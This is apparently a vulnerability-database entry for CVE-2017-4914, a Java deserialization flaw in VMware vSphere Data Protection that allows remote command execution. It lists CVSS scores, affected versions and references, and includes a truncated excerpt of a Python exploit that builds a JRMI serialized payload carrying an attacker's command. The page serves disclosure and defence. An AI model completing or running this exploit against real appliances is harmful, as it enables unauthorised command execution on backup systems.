Published: 07/06/2017 Updated: 13/08/2017

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9

VMScore: 755

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

VMware vSphere Data Protection (VDP) 6.1.x, 6.0.x, 5.8.x, and 5.5.x contains a deserialization issue. Exploitation of this issue may allow a remote malicious user to execute commands on the appliance.

Vulnerable Product	Search on Vulmon	Subscribe to Product
vmware vsphere data protection 5.5.6
vmware vsphere data protection 5.5.7
vmware vsphere data protection 5.8.2
vmware vsphere data protection 5.8.3
vmware vsphere data protection 6.1.1
vmware vsphere data protection 6.1.2
vmware vsphere data protection 5.5.10
vmware vsphere data protection 5.5.11
vmware vsphere data protection 6.0.1
vmware vsphere data protection 6.0.2
vmware vsphere data protection 6.0.3
vmware vsphere data protection 5.5.8
vmware vsphere data protection 5.5.9
vmware vsphere data protection 5.8.4
vmware vsphere data protection 6.0.0
vmware vsphere data protection 6.1.3
vmware vsphere data protection 5.5.1
vmware vsphere data protection 5.5.5
vmware vsphere data protection 5.8.0
vmware vsphere data protection 5.8.1
vmware vsphere data protection 6.0.4
vmware vsphere data protection 6.1.0

#!/usr/bin/env python import socket import sys import ssl def getHeader(): return '\x4a\x52\x4d\x49\x00\x02\x4b' def payload(): cmd = sysargv[4] cmdlen = len(cmd) data2 = '\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x00\x00\x00\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 ...

CWE-502 http://www.vmware.com/security/advisories/VMSA-2017-0010.html http://www.securityfocus.com/bid/98939 http://www.securitytracker.com/id/1038617 https://www.exploit-db.com/exploits/42152/https://nvd.nist.gov https://www.exploit-db.com/exploits/42152/

CVE-2017-4914

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect